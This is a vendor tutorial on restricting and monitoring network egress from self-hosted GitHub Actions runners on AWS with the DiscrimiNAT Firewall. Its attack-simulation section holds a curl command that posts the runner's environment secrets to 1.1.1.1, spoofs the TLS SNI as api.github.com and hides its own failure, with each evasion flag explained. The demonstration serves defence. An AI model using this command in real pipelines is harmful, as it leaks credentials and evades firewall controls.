When a Snowflake melts in a GitHub self-hosted runner ❄

Identify and protect GitHub Actions' permissible network egress, with leak detection

The pipeline in this demonstration runs in a self-hosted GitHub Actions Runner, spun up on AWS spot instances by philips-labs' terraform-aws-github-runner, and connects to Snowflake, with 'secrets' stored in GitHub itself. In this walkthrough:

🏗 we build the list of FQDNs such a pipeline normally accesses when run

🔒 enforce it via the DiscrimiNAT Firewall

🔇 introduce an unobtrusive curl command, like in the Codecov Uploader breach

🚫 see it fail in exfiltrating any data from the CI environment

🔎 detect the attempt in flow logs

The Setup

An egress-filtered VPC

A VPC with a Private Subnet whose access to the Internet is via a NAT Gateway. Except that, in this case, the NAT Gateway is the DiscrimiNAT Firewall, which supports egress filtering by FQDN.

For the various topologies and ways to deploy the DiscrimiNAT on AWS, see its AWS docs.

Self-Hosted Runners

While this demonstration builds upon the philips-labs' terraform-aws-github-runner Terraform module, the principles apply to any workload in an AWS VPC, from serverless Lambda functions in the VPC to EC2 instances.

Variables to override

In the philips-labs' terraform-aws-github-runner Terraform module, the following variables need to be overridden from their defaults to deploy the resources in a VPC, attached to egress-filtered Security Groups:

- vpc_id: The ID of the VPC with a Private Subnet that routes to the Internet via DiscrimiNAT
- lambda_subnet_ids: [ID of the Private Subnet in the said VPC, to deploy the Lambdas in]
- lambda_security_group_ids: [ID of the Security Group, say sg-fooLambda, that should be attached to the Lambda functions]
- subnet_ids: [ID of the Private Subnet in the said VPC, to deploy the Runners in]
- runner_additional_security_group_ids: [ID of the Security Group, say sg-fooRunner, that should be attached to the Runners]
- runner_egress_rules: []. Set to an empty list so the default, overly permissive, rule is not deployed.

Contact us for expert help at devsecops@chasersystems.com at any stage of your journey – we'll jump on a screen-sharing call right away!

Security Groups

The two Security Groups alluded to above, sg-fooLambda and sg-fooRunner, should be deployed without any rules and referenced in the variables highlighted above. The rules to be added will be discussed during the course of this exercise.

The Pipeline

The workflow is adapted from Snowflake's DevOps: Database Change Management with schemachange and GitHub quickstart – the objective of which is to build a simple CI/CD pipeline for Snowflake with GitHub Actions.

Modifications

There are two notable changes in the Action YAML from that quickstart:

- Change of machine-type from GitHub-hosted to self-hosted.

```diff
- runs-on: ubuntu-latest
+ runs-on: self-hosted
```

- Removal of the entire step that installs Python, because our choice of AMI has it already.

```diff
- - name: Use Python 3.8.x
-   uses: actions/setup-python@v2.2.1
-   with:
-     python-version: 3.8.x
```

see-thru Capture Run

Both the Security Groups, i.e. the one attached to the Lambda functions and the one attached to the Runners that come up dynamically, are configured with a see-thru rule so that the egressing traffic is logged without being blocked.

The see-thru rule type needs a date until which it remains in effect. We supply the current date, since we expect to capture all the destination FQDNs with a single run of the pipeline.

Configure Security Groups

The DiscrimiNAT Firewall is configured through annotations in the description fields of the Security Group Rules. The rules are then applied to the workloads attached to those Security Groups.

For reference, both the Security Groups, i.e. sg-fooLambda and sg-fooRunner, should have an outbound rule with the following parameters:

| Type | Protocol | Port range | Destination type | Destination | Description |
|---|---|---|---|---|---|
| All traffic | All | All | Custom | 0.0.0.0/0 | discriminat:see-thru:2021-09-05 |

![Configuring the see-thru rule in the AWS console](img/aws-see-thru.gif)

For a complete reference on the see-thru rule type including Terraform snippets, see AWS config reference.
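Since the see-thru date is simply the current date, the description can be generated rather than typed by hand. The following is a minimal sketch, and `see_thru_description` is a hypothetical helper name. It assumes the date is written as ISO 8601 (YYYY-MM-DD), matching the example in the table, and that "today" is taken in UTC. That UTC choice is our assumption, so check the see-thru reference for how the DiscrimiNAT actually interprets the date.

```python
from datetime import date, datetime, timezone
from typing import Optional


def see_thru_description(until: Optional[date] = None) -> str:
    """Build a see-thru rule description, e.g. discriminat:see-thru:2021-09-05."""
    if until is None:
        # Assumption: "today" is taken in UTC; the DiscrimiNAT docs are the
        # authority on how the expiry date is interpreted.
        until = datetime.now(timezone.utc).date()
    # date.isoformat() yields YYYY-MM-DD, the format used in the rule table.
    return f"discriminat:see-thru:{until.isoformat()}"


print(see_thru_description(date(2021, 9, 5)))  # discriminat:see-thru:2021-09-05
print(see_thru_description())  # today's date in UTC
```

The output is the string to paste into the rule's Description field, or to pass to whatever tooling manages your Security Group rules.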

Trigger Pipeline

With these Security Groups configured, we trigger the pipeline. A few minutes later, the Action has succeeded at GitHub with a ✅. Time to build the FQDNs list from the flow logs.

Filter & Aggregate Logs

In CloudWatch Logs Insights, with the DiscrimiNAT log group and a narrow time range selected, we enter the following query to determine which destinations the Lambda functions reached out to:

```
filter see_thru_exerted AND see_thru_gid = "sg-fooLambda"
| stats count() by see_thru_exerted, see_thru_gid, dhost, proto, dpt
```
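To make the query's semantics concrete, the following sketch reproduces the same filter-then-count over flow log records that have already been parsed into dictionaries. It assumes records carrying only the fields the query references (`see_thru_exerted`, `see_thru_gid`, `dhost`, `proto`, `dpt`). The sample records and the `count_destinations` name are hypothetical. `see_thru_exerted` and `see_thru_gid` are left out of the grouping key because the filter already pins them down.

```python
from collections import Counter
from typing import Iterable, Mapping


def count_destinations(records: Iterable[Mapping], gid: str) -> Counter:
    """Rough local analogue of:
    filter see_thru_exerted AND see_thru_gid = <gid>
    | stats count() by dhost, proto, dpt
    """
    counts: Counter = Counter()
    for r in records:
        # Keep only traffic let through by a see-thru rule of this Security Group.
        if r.get("see_thru_exerted") and r.get("see_thru_gid") == gid:
            counts[(r["dhost"], r["proto"], r["dpt"])] += 1
    return counts


# Hypothetical records, trimmed to the fields used by the query.
sample = [
    {"see_thru_exerted": True, "see_thru_gid": "sg-fooLambda", "dhost": "api.github.com", "proto": "tls", "dpt": 443},
    {"see_thru_exerted": True, "see_thru_gid": "sg-fooLambda", "dhost": "api.github.com", "proto": "tls", "dpt": 443},
    {"see_thru_exerted": True, "see_thru_gid": "sg-fooRunner", "dhost": "pypi.org", "proto": "tls", "dpt": 443},
    {"see_thru_exerted": False, "see_thru_gid": "sg-fooLambda", "dhost": "ssm.us-west-2.amazonaws.com", "proto": "tls", "dpt": 443},
]

for (dhost, proto, dpt), n in sorted(count_destinations(sample, "sg-fooLambda").items()):
    print(dhost, proto, dpt, n)  # api.github.com tls 443 2
```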

We get the results:

| dhost | proto | port |
|---|---|---|
| ec2.us-west-2.amazonaws.com | tls | 443 |
| ssm.us-west-2.amazonaws.com | tls | 443 |
| api.github.com | tls | 443 |

Repeating the exercise with the Runners' Security Group:

```
filter see_thru_exerted AND see_thru_gid = "sg-fooRunner"
| stats count() by see_thru_exerted, see_thru_gid, dhost, proto, dpt
```

As expected, we get a different set of results:

| dhost | proto | port |
|---|---|---|
| logs.us-west-2.amazonaws.com | tls | 443 |
| ssm.us-west-2.amazonaws.com | tls | 443 |
| ec2-instance-connect.us-west-2.amazonaws.com | tls | 443 |
| pypi.org | tls | 443 |
| files.pythonhosted.org | tls | 443 |
| foo-dist-2uejkf9hnqluredp0dfz7t9h.s3.us-west-2.amazonaws.com | tls | 443 |
| foo-dist-2uejkf9hnqluredp0dfz7t9h.s3.amazonaws.com | tls | 443 |
| amazonlinux-2-repos-us-west-2.s3.us-west-2.amazonaws.com | tls | 443 |
| rsa16937.snowflakecomputing.com | tls | 443 |
| pipelines.actions.githubusercontent.com | tls | 443 |
| github.com | tls | 443 |
| codeload.github.com | tls | 443 |
| api.github.com | tls | 443 |
| vstoken.actions.githubusercontent.com | tls | 443 |
| | | 80 |

Allowlist Enforcement

Lambda functions' rules

The Security Group sg-fooLambda is now straightforward to configure. We group the destinations by 'supplier', with one rule per supplier, all within the same Security Group:

| Type | Protocol | Port range | Destination type | Destination | Description |
|---|---|---|---|---|---|
| Custom TCP | TCP | 443 | Custom | 0.0.0.0/0 | discriminat:tls:ec2.us-west-2.amazonaws.com,ssm.us-west-2.amazonaws.com |
| Custom TCP | TCP | 443 | Custom | 0.0.0.0/1 | discriminat:tls:api.github.com |

![Configuring a tls rule in the AWS console](img/aws-protocol-tls.gif)

For a complete reference on the tls rule type including Terraform snippets, see AWS config reference.
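Each tls rule description packs one supplier's FQDNs into a single comma-separated `discriminat:tls:` annotation. The following sketch shows a hypothetical helper, `tls_description`, that builds such a string. It also guards against AWS's 255-character limit on Security Group rule descriptions. That limit is an AWS constraint the original does not mention. If a supplier's list outgrows it, the names would presumably need splitting across more than one rule.

```python
from typing import Iterable

# AWS caps a Security Group rule description at 255 characters.
MAX_DESCRIPTION_LEN = 255


def tls_description(fqdns: Iterable[str]) -> str:
    """Join one supplier's FQDNs into a single discriminat:tls: annotation."""
    # Hostnames are case-insensitive; normalise them and drop duplicates
    # while keeping the order in which they were observed.
    unique = list(dict.fromkeys(f.strip().lower() for f in fqdns))
    if not unique:
        raise ValueError("at least one FQDN is required")
    desc = "discriminat:tls:" + ",".join(unique)
    if len(desc) > MAX_DESCRIPTION_LEN:
        raise ValueError(f"description is {len(desc)} characters; split it across rules")
    return desc


print(tls_description(["ec2.us-west-2.amazonaws.com", "ssm.us-west-2.amazonaws.com"]))
# discriminat:tls:ec2.us-west-2.amazonaws.com,ssm.us-west-2.amazonaws.com
```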

⚠ And we delete the see-thru rule that was put in place.

Runners' rules

The Security Group sg-fooRunner is a bit more comprehensive:

| Type | Protocol | Port range | Destination type | Destination | Description |
|---|---|---|---|---|---|
| Custom TCP | TCP | 443 | Custom | 0.0.0.0/0 | discriminat:tls:logs.us-west-2.amazonaws.com,ssm.us-west-2.amazonaws.com |
| Custom TCP | TCP | 443 | Custom | 0.0.0.0/1 | discriminat:tls:pypi.org,files.pythonhosted.org |
| Custom TCP | TCP | 443 | Custom | 0.0.0.0/2 | discriminat:tls:foo-dist-2uejkf9hnqluredp0dfz7t9h.s3.us-west-2.amazonaws.com,foo-dist-2uejkf9hnqluredp0dfz7t9h.s3.amazonaws.com,amazonlinux-2-repos-us-west-2.s3.us-west-2.amazonaws.com |
| Custom TCP | TCP | 443 | Custom | 0.0.0.0/3 | discriminat:tls:rsa16937.snowflakecomputing.com |
| Custom TCP | TCP | 443 | Custom | 0.0.0.0/4 | discriminat:tls:pipelines.actions.githubusercontent.com,github.com,codeload.github.com,api.github.com,vstoken.actions.githubusercontent.com |
| Custom TCP | TCP | 80 | Custom | 0.0.0.0/0 | just for quick resets, discriminat will deny anyway |

For a complete reference on the tls rule type including Terraform snippets, see AWS config reference.
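In both rule tables, each additional port-443 rule points at a different destination (0.0.0.0/0, 0.0.0.0/1, and so on). The post does not say why. Our reading is that AWS rejects two rules with the same protocol, port range and destination. Varying the prefix length therefore keeps each supplier's rule distinct, while the /0 rule already admits all port-443 traffic at the Security Group level, and the actual filtering is left to the DiscrimiNAT.

The following sketch generates such a rule set under that assumption. The dictionary keys loosely mirror the arguments of Terraform's `aws_security_group_rule` resource. The `egress_rules` name and the supplier labels are hypothetical.

```python
from typing import Dict, List, Sequence


def egress_rules(suppliers: Dict[str, Sequence[str]], port: int = 443) -> List[dict]:
    """One egress rule per supplier, each with a distinct 0.0.0.0/N destination."""
    # Prefix lengths /0 to /32 give at most 33 distinct destinations.
    if len(suppliers) > 33:
        raise ValueError("only prefix lengths /0 to /32 are available")
    rules = []
    for prefix_len, fqdns in enumerate(suppliers.values()):
        rules.append({
            "type": "egress",
            "protocol": "tcp",
            "from_port": port,
            "to_port": port,
            "cidr_blocks": [f"0.0.0.0/{prefix_len}"],
            "description": "discriminat:tls:" + ",".join(fqdns),
        })
    return rules


runner = egress_rules({
    "aws": ["logs.us-west-2.amazonaws.com", "ssm.us-west-2.amazonaws.com"],
    "python": ["pypi.org", "files.pythonhosted.org"],
    "snowflake": ["rsa16937.snowflakecomputing.com"],
})
for rule in runner:
    print(rule["cidr_blocks"][0], rule["description"])
# 0.0.0.0/0 discriminat:tls:logs.us-west-2.amazonaws.com,ssm.us-west-2.amazonaws.com
# 0.0.0.0/1 discriminat:tls:pypi.org,files.pythonhosted.org
# 0.0.0.0/2 discriminat:tls:rsa16937.snowflakecomputing.com
```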

A few notes on the assortment of destinations above:

- The eagle-eyed Terraform practitioners will note that `foo-dist-<id>.s3.<region>.amazonaws.com` can easily, and rather should, be constructed from the Terraform context itself.
- The FQDN ec2-instance-connect.us-west-2.amazonaws.com has been left out of the allowlist, although it appeared in the observed logs, since it's only a telemetry endpoint and does not impact the pipeline's function.
- There is an allow-all rule for port 80. Although the pipeline works without it, various stages take a long time to get through since they wait for the connections to time out. By allowing such traffic through the Security Group, we instead send a quick protocol-level reset back to the calling client, hastening the pipeline stages. The DiscrimiNAT will not honour a rule that is neither ssh nor tls anyway, and will log the denial of this traffic nonetheless.
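The S3 hostnames follow a fixed pattern, so, as the first note suggests, they can be derived from the bucket name and region instead of being copied from logs. In Terraform this would be string interpolation. The following sketch renders the same construction in Python, with `s3_bucket_fqdns` as a hypothetical name. Both inputs would come from your own deployment. Here they are taken from the observed logs, and they reproduce the two foo-dist entries in the table.

```python
from typing import List


def s3_bucket_fqdns(bucket: str, region: str) -> List[str]:
    """Virtual-hosted-style S3 hostnames for one bucket, as seen in the logs."""
    return [
        f"{bucket}.s3.{region}.amazonaws.com",  # regional endpoint
        f"{bucket}.s3.amazonaws.com",  # legacy global endpoint
    ]


for fqdn in s3_bucket_fqdns("foo-dist-2uejkf9hnqluredp0dfz7t9h", "us-west-2"):
    print(fqdn)
# foo-dist-2uejkf9hnqluredp0dfz7t9h.s3.us-west-2.amazonaws.com
# foo-dist-2uejkf9hnqluredp0dfz7t9h.s3.amazonaws.com
```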

⚠ And we delete the see-thru rule that was put in place.

Trigger Pipeline

With the Security Groups now hardened, we trigger the pipeline again. A few minutes later, the Action has succeeded again at GitHub with a ✅ confirming that the now-configured egress access is adequate.

Attack Simulation

We insert a curl command to exfiltrate the secrets. It is inspired by the Codecov breach, except that we've evolved it to use HTTPS and to spoof its way past SNI-based firewalls.

Although in Codecov's case the command was inserted into the Docker image, we've laid it out in the clear here for demonstration. From an execution point of view, whether a command runs within a container or on the shell, or a network connection is made from a line of code in an application, it's all the same to a firewall sitting in the network path to the Internet.

Pipeline Modification

```diff
 ...
 echo "Step 1: Installing schemachange"
 pip3 install schemachange
+ curl -d "ENV $(env)" -m 0.5 --connect-to "api.github.com:443:1.1.1.1:443" \
+   -k -H "Host: 1.1.1.1" https://api.github.com/ || true
 echo "Step 2: Running schemachange"
 ...
```

This curl command:

- POSTs the entire environment of the process, which also contains many 'secrets' loaded from GitHub
- sets its own maximum execution time to 0.5 seconds, to evade detection
- connects to IP 1.1.1.1 for requests to api.github.com, while still presenting api.github.com as the TLS SNI
- accepts any SSL certificate sent by the server, whether or not it is valid for the domain name
- sets the Host header in the request to 1.1.1.1 as well, so that 1.1.1.1 does not receive the api.github.com Host header instead
- returns an exit code of 0 to the shell with || true, to indicate success regardless and let the pipeline continue, to evade detection
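The spoof works against a firewall that trusts the SNI alone. The TLS handshake names api.github.com, but the packets go to 1.1.1.1. One simplified countermeasure is to check that the destination IP is actually among the addresses the SNI hostname resolves to.

The sketch below illustrates that idea only. We do not claim it is how the DiscrimiNAT detects the spoof, and the function names are hypothetical. The stub resolver and its 192.0.2.10 address (a reserved documentation address) stand in for real DNS answers.

```python
import socket
from typing import Callable, Iterable

# A resolver maps a hostname to the IP addresses it currently resolves to.
Resolver = Callable[[str], Iterable[str]]


def system_resolver(host: str) -> list:
    # Each getaddrinfo entry is (family, type, proto, canonname, sockaddr);
    # sockaddr[0] is the address for both IPv4 and IPv6.
    infos = socket.getaddrinfo(host, 443, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def sni_matches_destination(sni: str, dest_ip: str, resolve: Resolver = system_resolver) -> bool:
    """True only if the destination IP is one that the SNI hostname resolves to."""
    try:
        return dest_ip in set(resolve(sni))
    except OSError:  # socket.gaierror is a subclass of OSError
        return False  # an unresolvable name is treated as a mismatch


def stub_resolver(host: str) -> list:
    # Offline stand-in for DNS; not api.github.com's real addresses.
    return {"api.github.com": ["192.0.2.10"]}.get(host, [])


print(sni_matches_destination("api.github.com", "1.1.1.1", stub_resolver))  # False
print(sni_matches_destination("api.github.com", "192.0.2.10", stub_resolver))  # True
```

A production check would also have to cope with DNS answers that change between the client's lookup and the firewall's, for example behind CDNs with short TTLs. That is one reason this is only a sketch.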

Trigger Pipeline

Pipeline still runs successfully to completion ✅. Since we deliberately did not suppress the output from the curl command, we notice the following in the pipeline's output:

```
curl: (35) OpenSSL SSL_connect: Connection reset by peer in connection to api.github.com:443
```

Spotting Leak Attempts



Filtering the DiscrimiNAT flow log with a filter such as {$.outcome = "disallowed" && $.proto = "tls"} yields the attempted connection!
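The same predicate can be applied offline to exported log lines, for example to replay a day's logs before wiring up a metric. The following sketch assumes one JSON object per line and relies only on the `outcome`, `proto` and `dhost` fields referenced in this post. The sample lines, including the `"allowed"` outcome value, are made up for illustration, and real records carry more fields.

```python
import json
from typing import Iterable, List


def disallowed_tls(lines: Iterable[str]) -> List[dict]:
    """Local analogue of the filter {$.outcome = "disallowed" && $.proto = "tls"}."""
    hits = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip lines that are not JSON
        if isinstance(event, dict) and event.get("outcome") == "disallowed" and event.get("proto") == "tls":
            hits.append(event)
    return hits


# Hypothetical, trimmed log lines.
log = [
    '{"outcome": "allowed", "proto": "tls", "dhost": "pypi.org", "dpt": 443}',
    '{"outcome": "disallowed", "proto": "tls", "dhost": "api.github.com", "dpt": 443}',
    "not json",
]
print([e["dhost"] for e in disallowed_tls(log)])  # ['api.github.com']
```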

From this point, should you choose to, these results could be turned into a metric and alarms built off it following the official guide on Using Amazon CloudWatch alarms.

Next Steps

🚀 Launch a free trial now from the AWS Marketplace

🚀 Get in touch with our stellar DevSecOps team, who will:

- not only guide you through the best architecture for your use-case

- but also troubleshoot any issues you may encounter

- and answer any geeky questions on protocols and whatnot